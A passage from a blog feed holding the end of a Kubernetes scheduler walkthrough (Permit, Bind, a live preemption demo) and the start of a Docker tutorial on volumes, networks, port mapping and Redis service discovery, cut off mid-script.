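<p>Remove the <code>reserve</code> call from <code>schedule</code> and all four pods land on <code>kube-worker-1</code>, because the cache never stops reporting it as empty.</p>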
<h2>Stage 10: Permit (the gang-scheduling hook)</h2>
<p>Permit is a hook with three possible outcomes per plugin. <code>Approve</code> lets the bind proceed (the default). <code>Wait</code> parks the pod, waiting for an external signal. <code>Reject</code> fails scheduling outright.</p>
<p>A stock cluster has no Permit plugins registered, so most pods sail through. But Permit is the seam where gang scheduling lives. The Coscheduling plugin from the scheduler-plugins project registers a Permit plugin for exactly this, and the pattern is simple: when the first pod of a gang arrives, return <code>Wait</code> and park it. When the last pod of the gang arrives, signal all the parked pods to proceed. They all move on to bind together.</p>
<p>Without Permit, gang scheduling on Kubernetes would be effectively impossible. You would have to bind each pod individually and then evict the rest when one failed. Permit lets you wait at the right point, before any pod is bound, so failures cost nothing.</p>
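<p>The wait-then-release pattern can be sketched in a few lines of Python. This is only a model of the idea: <code>GangPermit</code> is a made-up class, it tracks a single gang, and it leaves out the timeout that a real <code>Wait</code> verdict carries (after which a parked pod is rejected).</p>
<pre><code class="language-python">class GangPermit:
    """Toy Permit plugin: park pods until the whole gang has arrived."""

    def __init__(self, gang_size):
        self.gang_size = gang_size
        self.parked = []

    def permit(self, pod):
        self.parked.append(pod)
        if len(self.parked) != self.gang_size:
            return "Wait", []
        # Last member arrived: release everyone at once.
        released, self.parked = self.parked, []
        return "Approve", released


gang = GangPermit(gang_size=3)
for pod in ["trainer-0", "trainer-1", "trainer-2"]:
    print(pod, gang.permit(pod))
</code></pre>
<p>The first two calls return <code>Wait</code> with nothing released. The third returns <code>Approve</code> along with all three pod names.</p>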
<h2>Stages 11, 12, 13: PreBind, Bind, PostBind (commit and clean up)</h2>
<p>Permit returned <code>Approve</code>. Three stages left, all of them short.</p>
<p><strong>PreBind</strong> is the last opportunity to do work before the API server is told. The biggest user is <code>VolumeBinding</code>: for dynamically provisioned PVCs, this is where provisioning is triggered. The plugin records the chosen node on the PVC, then waits for the provisioner to create the PV and for the PVC's <code>spec.volumeName</code> to be set. By the time Bind runs, the PVC is bound and ready.</p>
<p><strong>Bind</strong> does the actual API call. The default is <code>DefaultBinder</code>, which calls <code>pods.Bind()</code> on the API server: a special subresource that accepts a <code>Binding</code> object and sets the pod's <code>spec.nodeName</code>. etcd persists the change via Raft, followers fsync, and the pod is now officially assigned.</p>
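<p>The request that binds a pod is small. As a rough illustration, this Python snippet builds the path and JSON body of a POST to the pod's <code>binding</code> subresource. It only constructs the payload and does not talk to a cluster; the helper name <code>binding_request</code> is made up for this sketch, and the pod and node names are borrowed from the demo later in this post.</p>
<pre><code class="language-python">import json


def binding_request(namespace, pod_name, node_name):
    """Build the path and body for a pod binding request."""
    path = f"/api/v1/namespaces/{namespace}/pods/{pod_name}/binding"
    body = {
        "apiVersion": "v1",
        "kind": "Binding",
        "metadata": {"name": pod_name},
        # The target is the node the scheduler picked.
        "target": {"apiVersion": "v1", "kind": "Node", "name": node_name},
    }
    return path, body


path, body = binding_request("default", "payments-critical", "kube-worker-1")
print("POST", path)
print(json.dumps(body, indent=2))
</code></pre>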
<p>The kubelet on the chosen node has been watching the API server for pods with its own <code>nodeName</code>. The instant the bind lands, the kubelet's informer fires. The pod is no longer the scheduler's concern; it now belongs to a different deep-dive (image pull, runc, the five syscalls).</p>
<p><strong>PostBind</strong> is cleanup. The scheduler removes the pod from its internal queue, and that scheduling cycle is done.</p>
<h2>The live demo, preemption in action</h2>
<p>Theory only carries so far. To watch the scheduler actually preempt a pod, we ran this against a real cluster (Kubernetes 1.36.1, three workers, one tainted). What follows are verbatim outputs from the live recording.</p>
<p>The setup: three worker nodes, with <code>kube-worker-3</code> tainted as a fake GPU node so the scheduler refuses to put general workloads there.</p>
<pre><code class="language-plaintext">$ kubectl get nodes
NAME            STATUS   ROLES           AGE   VERSION
kube-cp-01      Ready    control-plane   41d   v1.36.1
kube-worker-1   Ready    &lt;none&gt;          41d   v1.36.1
kube-worker-2   Ready    &lt;none&gt;          41d   v1.36.1
kube-worker-3   Ready    &lt;none&gt;          12d   v1.36.1
</code></pre>
<pre><code class="language-plaintext">$ kubectl describe node kube-worker-3 | grep -E 'Taints|cpu:|memory:'
Taints:             workload=gpu:NoSchedule
  cpu:                8
  memory:             32852Mi
  cpu:                7800m
  memory:             30100Mi
</code></pre>
<p>We deploy a regular nginx pod requesting eight CPU. It schedules cleanly onto <code>kube-worker-1</code> and starts up.</p>
<pre><code class="language-plaintext">$ kubectl apply -f nginx-pod.yaml
pod/nginx-demo created

$ kubectl get events --sort-by=.lastTimestamp | tail -5
LAST SEEN   TYPE     REASON      OBJECT           MESSAGE
6s          Normal   Scheduled   pod/nginx-demo   Successfully assigned default/nginx-demo to kube-worker-1
5s          Normal   Pulling     pod/nginx-demo   Pulling image "nginx:1.27"
3s          Normal   Pulled      pod/nginx-demo   Successfully pulled image "nginx:1.27" in 1.812s
2s          Normal   Created     pod/nginx-demo   Created container: nginx
2s          Normal   Started     pod/nginx-demo   Started container nginx
</code></pre>
<pre><code class="language-plaintext">$ kubectl get pod nginx-demo -o wide
NAME         READY   STATUS    RESTARTS   AGE   IP           NODE            NOMINATED NODE   READINESS GATES
nginx-demo   1/1     Running   0          18s   10.244.2.47  kube-worker-1   &lt;none&gt;           &lt;none&gt;
</code></pre>
<p>The cluster is now in a deliberately uncomfortable state. <code>kube-worker-1</code> is mostly full. <code>kube-worker-2</code> is similarly loaded. <code>kube-worker-3</code> is empty but tainted. Then we apply a critical pod that asks for the same eight CPU, with priority <code>1,000,000</code>, and no taint toleration.</p>
<pre><code class="language-plaintext">$ kubectl apply -f payments-high-prio.yaml
pod/payments-critical created
</code></pre>
<p>The first scheduling cycle has nothing to give it. Three nodes are insufficient, the fourth has the wrong taint. The scheduler turns to PostFilter, which walks each node looking for a preemption victim. The tainted node is no help. The non-tainted nodes each have a candidate to evict. The scheduler picks one, sets <code>nominatedNodeName</code>, and gracefully evicts the lower-priority nginx pod.</p>
<pre><code class="language-plaintext">$ kubectl describe pod payments-critical | tail -14
QoS Class:        Guaranteed
Priority:         1000000
Priority Class:   high-priority-payments
Events:
  Type     Reason            Age   From               Message
  ----     ------            ----  ----               -------
  Warning  FailedScheduling  14s   default-scheduler  0/4 nodes are available: 3 Insufficient cpu, 1 node(s) had untolerated taint {workload: gpu}. preemption: 0/4 nodes are available: 1 Preemption is not helpful for scheduling, 3 No preemption victims found for incoming pod.
  Normal   Preempted         9s    default-scheduler  Preempted by default/nginx-demo on node kube-worker-1
  Warning  FailedScheduling  9s    default-scheduler  0/4 nodes are available: 3 Insufficient cpu. preemption: 0/4 nodes are available.
  Normal   Scheduled         4s    default-scheduler  Successfully assigned default/payments-critical to kube-worker-1
  Normal   Pulling           3s    kubelet            Pulling image "payments:v2.4.1"
  Normal   Pulled            1s    kubelet            Successfully pulled image "payments:v2.4.1" in 1.632s
  Normal   Created           1s    kubelet            Created container: payments
  Normal   Started           1s    kubelet            Started container payments
</code></pre>
<p>Read those events carefully. There is a <code>FailedScheduling</code> at 14s, then <code>Preempted by default/nginx-demo on node kube-worker-1</code> at 9s, then another <code>FailedScheduling</code> (the cycle right after preemption, where the nginx pod was still terminating), then <code>Scheduled</code> at 4s. From request to running, on a real cluster, about ten seconds. That includes the graceful eviction of the victim, which is the slow part.</p>
<pre><code class="language-plaintext">$ kubectl get pods -o wide
NAME                READY   STATUS    RESTARTS   AGE   IP           NODE            NOMINATED NODE   READINESS GATES
payments-critical   1/1     Running   0          22s   10.244.2.58  kube-worker-1   &lt;none&gt;           &lt;none&gt;
</code></pre>
<p>That is preemption working as designed. A higher-priority pod arrives, the scheduler refuses to leave it pending when there is a lower-priority pod that could be moved, and the cluster reshuffles. No human intervention. No alert at 3 a.m.</p>
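<p>The per-node question PostFilter asks ("is there anything here I could evict to make room?") can be modelled in a few lines of Python. This is a heavily simplified sketch, not the real preemption algorithm: it tracks CPU only, evicts the lowest-priority pods first, and ignores PodDisruptionBudgets, affinity, and graceful termination. <code>plan_preemption</code>, the pod dictionaries, and the 500m of free CPU are all invented for the example.</p>
<pre><code class="language-python">from operator import lt


def plan_preemption(pods_on_node, free_millicpu, incoming):
    """Return pod names to evict so `incoming` fits, or None if eviction cannot help."""
    # Only pods with strictly lower priority than the incoming pod are eligible.
    eligible = [p for p in pods_on_node if lt(p["priority"], incoming["priority"])]
    eligible.sort(key=lambda p: p["priority"])  # least important first
    shortfall = max(0, incoming["millicpu"] - free_millicpu)
    victims = []
    for pod in eligible:
        if shortfall == 0:
            break
        victims.append(pod["name"])
        shortfall = max(0, shortfall - pod["millicpu"])
    return victims if shortfall == 0 else None


payments = {"name": "payments-critical", "priority": 1000000, "millicpu": 8000}
worker_1 = [{"name": "nginx-demo", "priority": 0, "millicpu": 8000}]
peer_node = [{"name": "other-critical", "priority": 1000000, "millicpu": 8000}]

print(plan_preemption(worker_1, 500, payments))   # ['nginx-demo']
print(plan_preemption(peer_node, 500, payments))  # None
</code></pre>
<p>A node whose pods all have equal or higher priority yields <code>None</code>, which corresponds to the "No preemption victims found" wording in the scheduler's events.</p>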
<h2>Three takeaways</h2>
<p>If only three things from this post stick with you:</p>
<p><strong>1. The scheduler is plugins all the way down.</strong> Since 1.19, every meaningful decision is delegated to a plugin at one of thirteen extension points. You can write your own, disable the defaults, run multiple profiles in parallel. Out-of-tree plugins such as Coscheduling exist because of this design; they did not have to fork the scheduler.</p>
<p><strong>2. Filter is binary; Score is weighted.</strong> A single <code>Unschedulable</code> verdict from any of fourteen Filter plugins kills a node's candidacy. But Score is a weighted vote across nine plugins, and the weights are not equal. <code>TaintToleration</code> (×3) is the strongest single signal at scoring time, followed by the four ×2 plugins (<code>NodeAffinity</code>, <code>PodTopologySpread</code>, <code>InterPodAffinity</code>, <code>DynamicResources</code>). Weights matter much more than most engineers realize.</p>
<p><strong>3. Reserve is why your scheduling is consistent.</strong> When you scale a deployment from one to twenty replicas and they all hit the scheduling queue in the same one-second window, Reserve's in-memory subtraction is what stops them from piling onto the same node. The scheduler commits an opinion before the API server even confirms the bind, and that opinion is visible to the next pod's scheduling cycle immediately.</p>
<h2>Where to go from here</h2>
<p>The full scheduler walkthrough on YouTube has the live demo, every stage animated, the preemption flow shown end-to-end. Link is at the top of this post.</p>
<p>If you want to step through it yourself rather than watch, the interactive at <a href="https://kubernetes-explained.vercel.app/scheduler">https://kubernetes-explained.vercel.app/scheduler</a> walks every internal step with annotations and lets you pause anywhere.</p>
<p>Sources for every claim in this post:</p>
<ul>
<li><p><code>pkg/scheduler/apis/config/testing/defaults/defaults.go</code>: plugin lists and weights</p>
</li>
<li><p><code>pkg/scheduler/framework/plugins/</code>: individual plugin implementations</p>
</li>
<li><p><code>pkg/scheduler/backend/queue/scheduling_queue.go</code>: the three queues</p>
</li>
<li><p><code>pkg/scheduler/framework/plugins/defaultpreemption/default_preemption.go</code>: the preemption algorithm</p>
</li>
<li><p>KEP-624: the scheduling framework graduation history</p>
</li>
<li><p>The <code>kubectl describe pod</code> events shown in the demo above are verbatim from a real Kubernetes 1.36.1 cluster, captured for this post.</p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Day 4: Breaking Isolation on Purpose - Volumes, Networks, and the Real World]]></title><description><![CDATA[7 Days of Docker in 2026 — When Containers Need to Talk and Remember

On Day 3, you built production-ready images with Dockerfiles, optimized layers, and mastered multi-stage builds. Every container y]]></description><link>https://blog.kubesimplify.com/day-4-breaking-isolation-on-purpose-volumes-networks-and-the-real-world</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-4-breaking-isolation-on-purpose-volumes-networks-and-the-real-world</guid><category><![CDATA[Docker]]></category><category><![CDATA[docker images]]></category><category><![CDATA[docker-volume]]></category><category><![CDATA[docker container]]></category><category><![CDATA[docker-storage]]></category><category><![CDATA[docker-network]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Mon, 27 Apr 2026 17:44:24 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/d2d87cef-3bb0-4d5b-845d-7ea7ef8c6d7e.svg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker in 2026</strong> — When Containers Need to Talk and Remember</p>
</blockquote>
<p>On <a href="https://blog.kubesimplify.com/day-3-stop-writing-dockerfiles-from-scratch">Day 3</a>, you built production-ready images with Dockerfiles, optimized layers, and mastered multi-stage builds. Every container you have launched so far has been a tiny, sealed universe - isolated filesystem, isolated network, isolated process tree. That isolation is the entire point of containers.</p>
<p>But here is the thing nobody tells you on day one: <strong>useful applications break isolation constantly.</strong> A database container that cannot remember data after a restart is useless. A web frontend that cannot reach its API backend is useless. A Redis cache that no service can connect to is useless.</p>
<p>Today, you learn to break isolation on purpose - with volumes (persistent storage), custom networks (container-to-container communication), and port mapping (exposing services to your host). These are the three controlled breaches that turn toy containers into real systems.</p>
<hr />
<h2>Table of Contents</h2>
<ul>
<li><p><a href="#1-data-dies-with-containers">1. Data Dies With Containers</a></p>
</li>
<li><p><a href="#2-volumes-breaking-filesystem-isolation">2. Volumes: Breaking Filesystem Isolation</a></p>
</li>
<li><p><a href="#3-networks-breaking-network-isolation">3. Networks: Breaking Network Isolation</a></p>
</li>
<li><p><a href="#4-port-mapping-breaking-host-isolation">4. Port Mapping: Breaking Host Isolation</a></p>
</li>
<li><p><a href="#5-putting-it-together-redis-service-discovery">5. Putting It Together: Redis Service Discovery</a></p>
</li>
<li><p><a href="#6-what-nobody-tells-you">6. What Nobody Tells You</a></p>
</li>
<li><p><a href="#7-quick-reference">7. Quick Reference</a></p>
</li>
<li><p><a href="#whats-next-day-5">What's Next: Day 5</a></p>
</li>
</ul>
<hr />
<h2>1. Data Dies With Containers</h2>
<p>Before I show you the fix, I need you to feel the problem.</p>
<p>Write a file inside a running container:</p>
<pre><code class="language-bash">docker run --name d4-writer alpine sh -c 'echo "Important!" &gt; /data.txt &amp;&amp; cat /data.txt'
</code></pre>
<pre><code class="language-plaintext">Important!
</code></pre>
<p>The file exists. Now remove that container and try to read from a fresh one:</p>
<pre><code class="language-bash">docker rm d4-writer

docker run --name d4-reader alpine sh -c 'cat /data.txt'
</code></pre>
<pre><code class="language-plaintext">cat: can't open '/data.txt': No such file or directory
</code></pre>
<p>Data is <strong>GONE!</strong></p>
<pre><code class="language-bash">docker rm d4-reader
</code></pre>
<p>Each container gets its own copy-on-write layer (<a href="https://blog.kubesimplify.com/day-2-your-images-are-a-supply-chain-and-it-s-probably-broken">Day 2</a>). When the container is removed, that layer is deleted with it. Every file, every database row, every log entry - deleted. This is not a bug. This is exactly how containers are supposed to work.</p>
<p>But it means you need a deliberate strategy for any data that outlives a single container. That is where volumes come in.</p>
<hr />
<h2>2. Volumes: Breaking Filesystem Isolation</h2>
<p>Docker gives you three ways to punch a hole through the filesystem wall. Each one trades some isolation for some capability.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/40c39bce-09cc-4d68-b515-153b5ace050c.svg" alt="" style="display:block;margin:0 auto" />

<h3>Named Volumes - Let Docker Manage It</h3>
<p>Named volumes are Docker-managed storage areas that live outside any container's lifecycle. You create them by name, mount them into containers, and Docker handles everything else - location on disk, permissions, and cleanup.</p>
<pre><code class="language-bash">docker volume create d4-data
</code></pre>
<pre><code class="language-plaintext">d4-data
</code></pre>
<p>Write data from one container:</p>
<pre><code class="language-bash">docker run --rm -v d4-data:/data alpine sh -c \
  'echo "Persisted on Wed Apr 22" &gt; /data/message.txt &amp;&amp; cat /data/message.txt'
</code></pre>
<pre><code class="language-plaintext">Persisted on Wed Apr 22
</code></pre>
<p>That container is already gone (thanks to <code>--rm</code>). Now read from a completely new container - different ID, different writable layer, different process:</p>
<pre><code class="language-bash">docker run --rm -v d4-data:/data alpine cat /data/message.txt
</code></pre>
<pre><code class="language-plaintext">Persisted on Wed Apr 22
</code></pre>
<p>The data survived. The volume exists independently of any container that mounts it.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/18e6ae99-a79f-4143-8044-dfd6e690fa37.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Best for:</strong> Databases, application state, anything that must survive container replacement. This is your default choice for production.</p>
<h3>Bind Mounts - Map Host Directories Directly</h3>
<p>A bind mount maps a specific path on your host machine into the container. The container sees your host files in real time — edit on the host, and the container picks it up instantly.</p>
<pre><code class="language-bash">mkdir -p /tmp/d4-site

cat &gt; /tmp/d4-site/index.html &lt;&lt; 'EOF'
&lt;h1&gt;Hello from a bind mount!&lt;/h1&gt;
EOF

docker run -d --name d4-web -p 8084:80 \
  -v /tmp/d4-site:/usr/share/nginx/html:ro nginx:alpine
</code></pre>
<p>The <code>:ro</code> flag means <strong>read-only</strong> - the container can read your files, but cannot modify them. This matters. More on that in section 6.</p>
<pre><code class="language-bash">curl -s http://localhost:8084 | grep '&lt;h1&gt;'
</code></pre>
<pre><code class="language-html">&lt;h1&gt;Hello from a bind mount!&lt;/h1&gt;
</code></pre>
<p>Now edit the file on your host and hit it again - no rebuild, no restart:</p>
<pre><code class="language-bash">echo '&lt;h1&gt;Updated LIVE!&lt;/h1&gt;' &gt; /tmp/d4-site/index.html

curl -s http://localhost:8084 | grep '&lt;h1&gt;'
</code></pre>
<pre><code class="language-html">&lt;h1&gt;Updated LIVE!&lt;/h1&gt;
</code></pre>
<p><strong>Best for:</strong> Local development with hot reload. Never use bind mounts in production — they create host dependency and break portability.</p>
<pre><code class="language-bash">docker stop d4-web &amp;&amp; docker rm d4-web
</code></pre>
<h3>tmpfs Mounts - Memory Only, Never Touches Disk</h3>
<pre><code class="language-bash">docker run --rm --tmpfs /app/scratch alpine sh -c \
  'echo "secret" &gt; /app/scratch/token.txt &amp;&amp; cat /app/scratch/token.txt'
</code></pre>
<pre><code class="language-plaintext">secret
</code></pre>
<p>The data lives in RAM. It is never written to disk and vanishes when the container stops. <strong>Best for:</strong> Secrets, API tokens, or scratch space that must never be persisted.</p>
<h3>The Decision Matrix</h3>
<table>
<thead>
<tr>
<th>Feature</th>
<th>Named Volumes</th>
<th>Bind Mounts</th>
<th>tmpfs</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Managed by Docker</strong></td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td><strong>Survives container removal</strong></td>
<td>Yes</td>
<td>Yes (on host)</td>
<td>No</td>
</tr>
<tr>
<td><strong>Pre-populated with image data</strong></td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td><strong>Performance</strong></td>
<td>Near-native</td>
<td>Native</td>
<td>Fastest</td>
</tr>
<tr>
<td><strong>Use in production</strong></td>
<td>Yes</td>
<td>No</td>
<td>Rarely</td>
</tr>
</tbody></table>
<blockquote>
<p><strong>Captain's Rule:</strong> When in doubt, use a named volume. Bind mounts are for development. tmpfs is for secrets. Named volumes are for everything else.</p>
</blockquote>
<hr />
<h2>3. Networks: Breaking Network Isolation</h2>
<p>You can persist data now. But a container that stores data and talks to nobody is just an expensive text file. Real applications are systems of services that need to <strong>find each other</strong>.</p>
<p>Docker networking has one massive gotcha, and I guarantee most tutorials will bury it three paragraphs too deep.</p>
<h3>The Default Bridge Trap</h3>
<p>Every container you have created so far lands on the <strong>default bridge network</strong>. Containers on the default bridge can reach each other by IP address — but <strong>not by name</strong>.</p>
<p>That means no DNS. No service discovery. Just raw IPs that change every time a container restarts. This is fine for throwaway experiments. It is terrible for anything real.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/2df4747b-a9d7-4f17-ad64-5c666f0c7b09.png" alt="" style="display:block;margin:0 auto" />

<h3>Custom Bridge Networks - DNS for Free</h3>
<p>Create a custom bridge network, and Docker gives you an embedded DNS server. Every container on that network is registered by its <code>--name</code>, and any other container can resolve that name to the correct IP.</p>
<pre><code class="language-bash">docker network create d4-net
</code></pre>
<p>Launch two containers on that network:</p>
<pre><code class="language-bash">docker run -d --name d4-web --network d4-net nginx:alpine

docker run -d --name d4-api --network d4-net nginx:alpine
</code></pre>
<p>Now ping by <strong>container name</strong> - not IP:</p>
<pre><code class="language-bash">docker exec d4-api ping -c 2 d4-web
</code></pre>
<pre><code class="language-plaintext">PING d4-web (172.22.0.2): 56 data bytes
64 bytes from 172.22.0.2: seq=0 ttl=64 time=0.721 ms
64 bytes from 172.22.0.2: seq=1 ttl=64 time=0.234 ms

--- d4-web ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.234/0.477/0.721 ms
</code></pre>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/27369d7a-d5a8-44c5-b98d-7bd100bd0426.png" alt="" style="display:block;margin:0 auto" />

<p>That <code>172.22.0.2</code> could change tomorrow if you recreate the container. But <code>d4-web</code> as a DNS name will always resolve to whatever IP the <code>d4-web</code> container currently holds. This is the same pattern Kubernetes uses with its internal DNS — Docker just gives it to you for free on custom networks.</p>
<blockquote>
<p><strong>Key Concept:</strong> Default bridge = no DNS, hardcoded IPs, fragile. Custom bridge = automatic DNS, service discovery by name, resilient. Always create a custom bridge for multi-container applications.</p>
</blockquote>
<pre><code class="language-bash">docker stop d4-web d4-api &amp;&amp; docker rm d4-web d4-api
</code></pre>
<h3>The Full Isolation Spectrum</h3>
<p>Bridge networks are what you will use most days, but they are only two points on a wider spectrum. Docker ships several network modes, each sitting at a different level of isolation. Knowing they exist saves you from reaching for the wrong tool.</p>
<table>
<thead>
<tr>
<th>Network mode</th>
<th>Isolation level</th>
<th>When to reach for it</th>
</tr>
</thead>
<tbody><tr>
<td><code>none</code></td>
<td>Maximum: no networking at all</td>
<td>Batch jobs that should never touch the network. Forensic analysis. Testing graceful network-failure paths.</td>
</tr>
<tr>
<td>Custom bridge</td>
<td>Strong: project-scoped DNS, isolated from default bridge</td>
<td>99% of multi-container apps on a single host (the section above).</td>
</tr>
<tr>
<td>Default bridge</td>
<td>Weak: IP routing, no DNS</td>
<td>One-off experiments. Legacy quirks.</td>
</tr>
<tr>
<td><code>host</code></td>
<td>None: container shares the host's network namespace</td>
<td>Performance-critical apps where bridge NAT is the bottleneck. Low-level networking tools that must see every interface on the host.</td>
</tr>
<tr>
<td><code>overlay</code></td>
<td>Multi-host: one logical network spanning several Docker hosts</td>
<td>Swarm clusters. Multi-machine setups. Preview for the days when one laptop is not enough.</td>
</tr>
</tbody></table>
<p><code>--network host</code> drops the network wall entirely. Your container shares the host's network stack, sees every interface, binds ports directly without NAT. Fastest possible networking, zero translation. The cost: <code>-p</code> port mappings are ignored because there is nothing left to map, two containers cannot bind the same port, and you lose service-name DNS. Use it for monitoring agents, packet-capture tools, or latency-sensitive workloads on Linux.</p>
<pre><code class="language-bash">docker run --rm --network host alpine ip addr show | head -10
</code></pre>
<p>You will see the same interfaces as <code>ip addr show</code> on your host. That is the point: there is no separate network namespace.</p>
<p><code>--network none</code> removes networking completely. The container has only a loopback interface. No outbound connections, no inbound traffic, no DNS. This is the right choice for jobs that should never reach the network, or for proving that your application degrades gracefully when networking is unavailable.</p>
<pre><code class="language-bash">docker run --rm --network none alpine ping -c 2 google.com
</code></pre>
<pre><code class="language-plaintext">ping: bad address 'google.com'
</code></pre>
<p>No DNS, no route. Exactly as expected.</p>
<p><code>overlay</code> <strong>networks</strong> stretch a single logical network across multiple Docker hosts. They are how Swarm wires services together across a cluster of machines. You will not use overlay on a single laptop, but it is worth knowing the name for the day you graduate from one host to many.</p>
<blockquote>
<p><strong>Captain's Rule:</strong> Custom bridge for almost everything. <code>host</code> when bridge NAT is the bottleneck. <code>none</code> when the container should be airtight. <code>overlay</code> when you outgrow a single machine.</p>
</blockquote>
<hr />
<h2>4. Port Mapping: Breaking Host Isolation</h2>
<p>Volumes break filesystem isolation. Networks break container-to-container isolation. Port mapping breaks the final wall: <strong>host isolation</strong>.</p>
<p>By default, no traffic from your host machine can reach a container's internal ports. You explicitly map a host port to a container port with <code>-p</code>:</p>
<pre><code class="language-bash">docker run -d --name d4-nginx -p 8080:80 nginx:alpine
</code></pre>
<p>This means: "Traffic hitting <code>localhost:8080</code> on my host gets forwarded to port <code>80</code> inside the container."</p>
<pre><code class="language-bash">curl -s http://localhost:8080 | head -5
</code></pre>
<pre><code class="language-html">&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Welcome to nginx!&lt;/title&gt;
&lt;/head&gt;
</code></pre>
<p>Without <code>-p 8080:80</code>, that nginx process would be running and listening — but completely unreachable from your browser or curl.</p>
<h3>Port Mapping Syntax</h3>
<table>
<thead>
<tr>
<th>Syntax</th>
<th>Meaning</th>
</tr>
</thead>
<tbody><tr>
<td><code>-p 8080:80</code></td>
<td>Host 8080 → Container 80</td>
</tr>
<tr>
<td><code>-p 127.0.0.1:8080:80</code></td>
<td>Only bind to localhost (not exposed to network)</td>
</tr>
<tr>
<td><code>-p 8080:80/udp</code></td>
<td>UDP instead of TCP</td>
</tr>
<tr>
<td><code>-p 80</code></td>
<td>Map container port 80 to a random host port</td>
</tr>
</tbody></table>
<blockquote>
<p><strong>Captain's Rule:</strong> In production, always bind to <code>127.0.0.1</code> unless you explicitly want external traffic. A bare <code>-p 8080:80</code> binds to <code>0.0.0.0</code> — every network interface on your host, including public-facing ones.</p>
</blockquote>
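<p>If the four syntax forms in the table blur together, it can help to see them pulled apart. This Python sketch splits a <code>-p</code> value into host IP, host port, container port, and protocol. It is an illustration of the syntax, not Docker's own parser: <code>parse_publish</code> is a made-up helper, and it handles only the four forms shown above (no IPv6 addresses, no port ranges).</p>
<pre><code class="language-python">def parse_publish(spec):
    """Split a docker -p value into its parts (IPv4 and single ports only)."""
    ports, _, protocol = spec.partition("/")
    parts = ports.split(":")
    container_port = int(parts[-1])
    # With one field there is no host port: Docker picks a random free one.
    host_port = int(parts[-2]) if len(parts) != 1 else None
    # Without an explicit IP the mapping binds every interface, i.e. 0.0.0.0.
    host_ip = parts[0] if len(parts) == 3 else "0.0.0.0"
    return {
        "host_ip": host_ip,
        "host_port": host_port,
        "container_port": container_port,
        "protocol": protocol or "tcp",
    }


for spec in ["8080:80", "127.0.0.1:8080:80", "8080:80/udp", "80"]:
    print(spec, parse_publish(spec))
</code></pre>
<p>Note how only the three-field form changes <code>host_ip</code>. Every other form ends up on <code>0.0.0.0</code>, which is exactly the exposure the rule above warns about.</p>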
<pre><code class="language-bash">docker stop d4-nginx &amp;&amp; docker rm d4-nginx
</code></pre>
<hr />
<h2>5. Putting It Together: Redis Service Discovery</h2>
<p>Time to combine everything. We will run a Redis container and an Alpine client on a custom network, use DNS-based service discovery to connect by name, and persist Redis data with a named volume.</p>
<h3>Set Up the Network and Volume</h3>
<pre><code class="language-bash">docker volume create d4-redis-data

docker network create d4-app-net
</code></pre>
<h3>Launch Redis with a Named Volume</h3>
<pre><code class="language-bash">docker run -d \
--name d4-redis \
--network d4-app-net \
-v d4-redis-data:/data \
redis:7-alpine redis-server --appendonly yes
</code></pre>
<p>The <code>--appendonly yes</code> flag tells Redis to log every write to an append-only file on disk (inside <code>/data</code>, which is backed by our volume). Without it, Redis relies only on periodic snapshots, so any writes made since the last snapshot are lost if the container is killed.</p>
<h3>Connect an App Container by Name</h3>
<pre><code class="language-bash">docker run --rm -it \
--name d4-client \
--network d4-app-net \
redis:7-alpine redis-cli -h d4-redis
</code></pre>
<p>Notice <code>-h d4-redis</code>: we connect using the <strong>container name</strong>, not an IP. Docker's embedded DNS resolves it automatically.</p>
<pre><code class="language-plaintext">d4-redis:6379&gt; SET greeting "Hello Day 4!"
OK
d4-redis:6379&gt; GET greeting
"Hello Day 4!"
d4-redis:6379&gt; exit
</code></pre>
<p>The value is set. Now kill the Redis container, start a fresh one with the same volume and network, and prove the data survived:</p>
<pre><code class="language-bash">docker rm -f d4-redis

docker run -d \
--name d4-redis \
--network d4-app-net \
-v d4-redis-data:/data \
redis:7-alpine redis-server --appendonly yes
</code></pre>
<pre><code class="language-bash">docker run --rm \
--network d4-app-net \
redis:7-alpine redis-cli -h d4-redis GET greeting
</code></pre>
<pre><code class="language-plaintext">"Hello Day 4!"
</code></pre>
<p>The container was destroyed and replaced. The data persisted (volume). The new client found it by name (custom network DNS). This is the pattern behind every microservice architecture - disposable compute, durable storage, DNS-based discovery.</p>
<h3>Cleanup</h3>
<pre><code class="language-bash">docker rm -f d4-redis
docker network rm d4-app-net
docker volume rm d4-redis-data d4-data
</code></pre>
<hr />
<h2>6. What Nobody Tells You</h2>
<p>Here is the section I wish someone had written for me when I was learning Docker.</p>
<h3>Bind Mounts With <code>:rw</code> Can Destroy Your Code</h3>
<p>By default, bind mounts are <code>:rw</code> (read-write). That means the container has <strong>full write access to your host directory</strong>. A misconfigured build step, a buggy script, or a careless <code>rm -rf</code> inside the container can modify or delete your actual source code on the host.</p>
<pre><code class="language-bash"># This is dangerous:
docker run -v "$(pwd)":/app some-image npm run build
# If the build writes to /app, it's writing to YOUR filesystem.
</code></pre>
<p>Always use <code>:ro</code> for bind mounts unless the container genuinely needs to write back to the host. And when it does need to write, mount only the specific subdirectory it needs — never your entire project root with write access.</p>
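<p>As a rough sketch of that advice, the hypothetical helper below mounts the project read-only and gives the container write access to a single output directory. The <code>safe_build</code> name, the <code>dist</code> directory, and the <code>/app</code> paths are assumptions for illustration; adjust them to wherever your build actually writes.</p>
<pre><code class="language-bash"># Hypothetical helper: project root is read-only, only ./dist is writable.
# Usage: safe_build PROJECT_DIR IMAGE COMMAND...
safe_build() {
  project_dir="$1"
  image="$2"
  shift 2
  # The nested mount point must exist on the host before the container starts.
  mkdir -p "$project_dir/dist"
  docker run --rm \
    -v "$project_dir":/app:ro \
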